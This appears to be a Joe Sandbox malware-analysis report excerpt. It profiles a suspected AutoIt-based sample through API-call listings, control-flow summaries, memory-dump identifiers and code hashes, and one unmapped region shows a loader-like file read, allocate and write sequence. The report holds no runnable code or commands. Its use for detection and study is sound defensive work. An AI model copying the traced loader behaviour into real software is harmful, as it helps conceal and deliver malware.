                                    • __invoke_watson.LIBCMT ref: 001663C3
                                    • __wsopen_helper.LIBCMT ref: 001663DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                    • String ID: @
                                    • API String ID: 3896587723-2766056989
                                    • Opcode ID: a01f81c7f4add6e8f006970f2e10bcd0baa2b592827dfaeed8212fc6da5ce757
                                    • Instruction ID: dfc35322c28eff2f3c4fb598bc056d9299aac2e1c563d78bc6472bbe3c37a5f8
                                    • Opcode Fuzzy Hash: a01f81c7f4add6e8f006970f2e10bcd0baa2b592827dfaeed8212fc6da5ce757
                                    • Instruction Fuzzy Hash: BB22457190060A9FEF299F68DC56BBD7B72FF15324F244229E8219B2E2C7358D60C791
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit
                                    • String ID:
                                    • API String ID: 3074181302-0
                                    • Opcode ID: 4aaa802a38cf686a801122e5d7558e70716f2d9bcf00c76174fc013859e00264
                                    • Instruction ID: deec594c3ce7456f9d2658a1bc933709b58034b4c042add320cba354910bcc4c
                                    • Opcode Fuzzy Hash: 4aaa802a38cf686a801122e5d7558e70716f2d9bcf00c76174fc013859e00264
                                    • Instruction Fuzzy Hash: 12324374A04241CFDB258F68D880BBD7BB1BF56315F29806EECB59F292D770984AC760

                                    Control-flow Graph

                                    APIs
                                    • _wcscpy.LIBCMT ref: 0017FA96
                                    • _wcschr.LIBCMT ref: 0017FAA4
                                    • _wcscpy.LIBCMT ref: 0017FABB
                                    • _wcscat.LIBCMT ref: 0017FACA
                                    • _wcscat.LIBCMT ref: 0017FAE8
                                    • _wcscpy.LIBCMT ref: 0017FB09
                                    • __wsplitpath.LIBCMT ref: 0017FBE6
                                    • _wcscpy.LIBCMT ref: 0017FC0B
                                    • _wcscpy.LIBCMT ref: 0017FC1D
                                    • _wcscpy.LIBCMT ref: 0017FC32
                                    • _wcscat.LIBCMT ref: 0017FC47
                                    • _wcscat.LIBCMT ref: 0017FC59
                                    • _wcscat.LIBCMT ref: 0017FC6E
                                      • Part of subcall function 0017BFA4: _wcscmp.LIBCMT ref: 0017C03E
                                      • Part of subcall function 0017BFA4: __wsplitpath.LIBCMT ref: 0017C083
                                      • Part of subcall function 0017BFA4: _wcscpy.LIBCMT ref: 0017C096
                                      • Part of subcall function 0017BFA4: _wcscat.LIBCMT ref: 0017C0A9
                                      • Part of subcall function 0017BFA4: __wsplitpath.LIBCMT ref: 0017C0CE
                                      • Part of subcall function 0017BFA4: _wcscat.LIBCMT ref: 0017C0E4
                                      • Part of subcall function 0017BFA4: _wcscat.LIBCMT ref: 0017C0F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                    • String ID: >>>AUTOIT SCRIPT<<<
                                    • API String ID: 2955681530-2806939583
                                    • Opcode ID: e460276c4d1a1e7f6cae9148001693eb456ca6e1a1d82cacabb5c5725cbb9a37
                                    • Instruction ID: d4e0bba1cba1e9fa7c3faddb3392f098f5e4353e3d9b9be6041febf6ae05c9f7
                                    • Opcode Fuzzy Hash: e460276c4d1a1e7f6cae9148001693eb456ca6e1a1d82cacabb5c5725cbb9a37
                                    • Instruction Fuzzy Hash: 999183715046059FDB21EB94C891F9FB3F8BFA8310F04886DF9599B291DB30EA49CB91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0017BDB4: __time64.LIBCMT ref: 0017BDBE
                                      • Part of subcall function 00134517: _fseek.LIBCMT ref: 0013452F
                                    • __wsplitpath.LIBCMT ref: 0017C083
                                      • Part of subcall function 00151DFC: __wsplitpath_helper.LIBCMT ref: 00151E3C
                                    • _wcscpy.LIBCMT ref: 0017C096
                                    • _wcscat.LIBCMT ref: 0017C0A9
                                    • __wsplitpath.LIBCMT ref: 0017C0CE
                                    • _wcscat.LIBCMT ref: 0017C0E4
                                    • _wcscat.LIBCMT ref: 0017C0F7
                                    • _wcscmp.LIBCMT ref: 0017C03E
                                      • Part of subcall function 0017C56D: _wcscmp.LIBCMT ref: 0017C65D
                                      • Part of subcall function 0017C56D: _wcscmp.LIBCMT ref: 0017C670
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0017C2A1
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0017C338
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0017C34E
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0017C35F
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0017C371
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                    • String ID: p1Wu`KXu
                                    • API String ID: 2378138488-4063981602
                                    • Opcode ID: 429fb969c3d5163fdad87c8fb430192347bf1188241324635a16caf39649e221
                                    • Instruction ID: 3f5609535e8ca36e4ff704131e85d442eae4da9e95762b4de6ce4f8b75a29e07
                                    • Opcode Fuzzy Hash: 429fb969c3d5163fdad87c8fb430192347bf1188241324635a16caf39649e221
                                    • Instruction Fuzzy Hash: 9FC11BB1A00219AFDF25DF95CC81EDEB7BDAF59310F0080AAF619E6151DB709A848F61

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00133E79
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00133E88
                                    • LoadIconW.USER32(00000063), ref: 00133E9E
                                    • LoadIconW.USER32(000000A4), ref: 00133EB0
                                    • LoadIconW.USER32(000000A2), ref: 00133EC2
                                      • Part of subcall function 00134024: LoadImageW.USER32(00130000,00000063,00000001,00000010,00000010,00000000), ref: 00134048
                                    • RegisterClassExW.USER32(?), ref: 00133F30
                                      • Part of subcall function 00133F53: GetSysColorBrush.USER32(0000000F), ref: 00133F86
                                      • Part of subcall function 00133F53: RegisterClassExW.USER32(00000030), ref: 00133FB0
                                      • Part of subcall function 00133F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00133FC1
                                      • Part of subcall function 00133F53: LoadIconW.USER32(000000A9), ref: 00134004
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 2880975755-4155596026
                                    • Opcode ID: 01978dc6ff7f8b9887aa5ed5c4f0607bf4ed86b5cc7048fd4cdfb43e6efe37fc
                                    • Instruction ID: 0200a5842699be817e70d583e10959c2f6bb37db2aca27f6054d9a548df86965
                                    • Opcode Fuzzy Hash: 01978dc6ff7f8b9887aa5ed5c4f0607bf4ed86b5cc7048fd4cdfb43e6efe37fc
                                    • Instruction Fuzzy Hash: 81213CB4D04304FBDB04DFAAEC49AA9BBF9FB48314F14422AE214A36A0D7754680CF95

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00133F86
                                    • RegisterClassExW.USER32(00000030), ref: 00133FB0
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00133FC1
                                    • LoadIconW.USER32(000000A9), ref: 00134004
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: 8ba895fcd22921142b1c02a9f1ce86ac6ad94e795aa8e0e2d0b43174e9fdbce2
                                    • Instruction ID: 9761ba58c768e622d0127b5b77681c4596599559fd35a69bed1ad5b2f6d78cee
                                    • Opcode Fuzzy Hash: 8ba895fcd22921142b1c02a9f1ce86ac6ad94e795aa8e0e2d0b43174e9fdbce2
                                    • Instruction Fuzzy Hash: EB21C4B5900318EFDB00DFA5E889BDDBBB4FB08714F00421AFA11E66A0EBB54584CF91

                                    Control-flow Graph

                                    control_flow_graph 1296 177b830-177b882 call 177b730 CreateFileW 1299 177b884-177b886 1296->1299 1300 177b88b-177b898 1296->1300 1301 177b9e4-177b9e8 1299->1301 1303 177b8ab-177b8c2 VirtualAlloc 1300->1303 1304 177b89a-177b8a6 1300->1304 1305 177b8c4-177b8c6 1303->1305 1306 177b8cb-177b8f1 CreateFileW 1303->1306 1304->1301 1305->1301 1307 177b915-177b92f ReadFile 1306->1307 1308 177b8f3-177b910 1306->1308 1310 177b953-177b957 1307->1310 1311 177b931-177b94e 1307->1311 1308->1301 1313 177b959-177b976 1310->1313 1314 177b978-177b98f WriteFile 1310->1314 1311->1301 1313->1301 1315 177b991-177b9b8 1314->1315 1316 177b9ba-177b9df CloseHandle VirtualFree 1314->1316 1315->1301 1316->1301
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0177B875
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction ID: 7255bbec1e28517f8ed0033bb97f8351c1a905fa54d47537346f7494f5b5cabc
                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction Fuzzy Hash: CE51D975A50208FBEF24DFB4CC49FEEB778AF48701F108554F65AEB280DA749A458B60

                                    Control-flow Graph

                                    control_flow_graph 1326 1349fb-134a25 call 13bcce RegOpenKeyExW 1329 1a41cc-1a41e3 RegQueryValueExW 1326->1329 1330 134a2b-134a2f 1326->1330 1331 1a4246-1a424f RegCloseKey 1329->1331 1332 1a41e5-1a4222 call 14f4ea call 1347b7 RegQueryValueExW 1329->1332 1337 1a423d-1a4245 call 1347e2 1332->1337 1338 1a4224-1a423b call 136a63 1332->1338 1337->1331 1338->1337
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00134A1D
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001A41DB
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001A421A
                                    • RegCloseKey.ADVAPI32(?), ref: 001A4249
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                    • API String ID: 1586453840-614718249
                                    • Opcode ID: 4409f42800b9768a2f78b61dd15fd041f51ce5457f91d52b50e9f9ffa50f2d93
                                    • Instruction ID: 6b3c493a6b3ea2bd7973c78a1c383465d2efbf04204763eec3f3f13f25bca75a
                                    • Opcode Fuzzy Hash: 4409f42800b9768a2f78b61dd15fd041f51ce5457f91d52b50e9f9ffa50f2d93
                                    • Instruction Fuzzy Hash: 6F113A75A00109BFEB14ABA4DD86EBF7BBCEF15354F004069B506E6191EB70AE429B50

                                    Control-flow Graph

                                    control_flow_graph 1353 1336b8-133728 CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001336E6
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00133707
                                    • ShowWindow.USER32(00000000,?,?,?,?,00133AA3,?), ref: 0013371B
                                    • ShowWindow.USER32(00000000,?,?,?,?,00133AA3,?), ref: 00133724
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: afc8f46f014f9df4563ee26781ef740fc753ae07a35dcdff797655434e81aca6
                                    • Instruction ID: a1eb234c809c6407b9716ecd1c5377cc21461fba628d3ab36828fcca42203989
                                    • Opcode Fuzzy Hash: afc8f46f014f9df4563ee26781ef740fc753ae07a35dcdff797655434e81aca6
                                    • Instruction Fuzzy Hash: B1F0DA755402D0BAE7315B57AC08E773E7DE7C6F24B00012EBA04A25A0DA6148D5DBB0

                                    Control-flow Graph

                                    control_flow_graph 1458 1351af-1351c5 1459 1352a2-1352a6 1458->1459 1460 1351cb-1351e0 call 136b0f 1458->1460 1463 1351e6-135206 call 136a63 1460->1463 1464 1a3ca1-1a3cb0 LoadStringW 1460->1464 1466 1a3cbb-1a3cd3 call 13510d call 134db1 1463->1466 1469 13520c-135210 1463->1469 1464->1466 1476 135220-13529d call 150d50 call 1350e6 call 150d23 Shell_NotifyIconW call 13cb37 1466->1476 1480 1a3cd9-1a3cf7 call 13518c call 134db1 call 13518c 1466->1480 1470 1352a7-1352b0 call 136eed 1469->1470 1471 135216-13521b call 13510d 1469->1471 1470->1476 1471->1476 1476->1459 1480->1476
                                    APIs
                                    • _memset.LIBCMT ref: 0013522F
                                    • _wcscpy.LIBCMT ref: 00135283
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00135293
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001A3CB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 1053898822-1585850449
                                    • Opcode ID: 7110183ff731178baf8b44d51da0f4ea8222130170d60b1efbf90bd499dcf285
                                    • Instruction ID: 2612cdfe471a1a2dbab9416b8041fef21614fbc811ab691f3c2ae2c74854707d
                                    • Opcode Fuzzy Hash: 7110183ff731178baf8b44d51da0f4ea8222130170d60b1efbf90bd499dcf285
                                    • Instruction Fuzzy Hash: FC31AD71108740AFD325EBA0EC46FEF77E8AB64750F00451AF59992091EB70A688CB96

                                    Control-flow Graph

                                    control_flow_graph 1493 1340e5-134105 call 15f8a0 1496 1a370e-1a3777 call 150d50 1493->1496 1497 13410b-134136 call 13660f call 1340a7 call 1349a0 call 134139 1493->1497 1505 1a3779 1496->1505 1506 1a3780-1a3789 call 136a63 1496->1506 1505->1506 1510 1a378e 1506->1510 1510->1510
                                    APIs
                                    • _memset.LIBCMT ref: 001A3725
                                      • Part of subcall function 0013660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001353B1,?,?,001361FF,?,00000000,00000001,00000000), ref: 0013662F
                                      • Part of subcall function 001340A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001340C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: NamePath$FullLong_memset
                                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                                    • API String ID: 3051022977-1954568251
                                    • Opcode ID: 4b281fbc3646e6e2b0aa22277ab8c768c32098eea61e740964de5d699bdba60e
                                    • Instruction ID: 56a7fad37f67c93c453d36c9ed7ab17b42349a8b60ba48f087e48a66542f9cf2
                                    • Opcode Fuzzy Hash: 4b281fbc3646e6e2b0aa22277ab8c768c32098eea61e740964de5d699bdba60e
                                    • Instruction Fuzzy Hash: 1321D571A00688ABCF01DFD4D805BEEBBF8AF59304F008059F414BB241DBB46A898F61
                                    APIs
                                      • Part of subcall function 001341A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001339FE,?,00000001), ref: 001341DB
                                    • _free.LIBCMT ref: 001A36B7
                                    • _free.LIBCMT ref: 001A36FE
                                      • Part of subcall function 0013C833: __wsplitpath.LIBCMT ref: 0013C93E
                                      • Part of subcall function 0013C833: _wcscpy.LIBCMT ref: 0013C953
                                      • Part of subcall function 0013C833: _wcscat.LIBCMT ref: 0013C968
                                      • Part of subcall function 0013C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0013C978
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 805182592-1757145024
                                    • Opcode ID: a7828c20f592b3f6b2b446a9a6359855fd85f8970608a859f5a84dac4a1fccb5
                                    • Instruction ID: 90d6152b6913b7d84f2b089053e0afe088dbfb3a2026d8b8524d5ec88e19eb34
                                    • Opcode Fuzzy Hash: a7828c20f592b3f6b2b446a9a6359855fd85f8970608a859f5a84dac4a1fccb5
                                    • Instruction Fuzzy Hash: DC916375910219EFCF05EFA4DC91AEDB7B4BF29310F104429F426AB291DB34AA45CB90
                                    APIs
                                      • Part of subcall function 0177D200: Sleep.KERNELBASE(000001F4), ref: 0177D211
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0177D437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 7RXW5AB1R9N9M
                                    • API String ID: 2694422964-313853021
                                    • Opcode ID: 67799b6b193445083047bb5dc5dbd49d2b3cc34bce5e1fcb07612b40c30da56c
                                    • Instruction ID: 0e63347f884339f534aa00581c2bedbc70d4e3813d658d1283f7cc2feff0dfc3
                                    • Opcode Fuzzy Hash: 67799b6b193445083047bb5dc5dbd49d2b3cc34bce5e1fcb07612b40c30da56c
                                    • Instruction Fuzzy Hash: 6F518030D04249DBEF21DBF4C859BEEBB79AF58304F004599E608BB2C1D6B91B45CB65
                                    APIs
                                      • Part of subcall function 00135374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001F1148,?,001361FF,?,00000000,00000001,00000000), ref: 00135392
                                      • Part of subcall function 001349FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00134A1D
                                    • _wcscat.LIBCMT ref: 001A2D80
                                    • _wcscat.LIBCMT ref: 001A2DB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
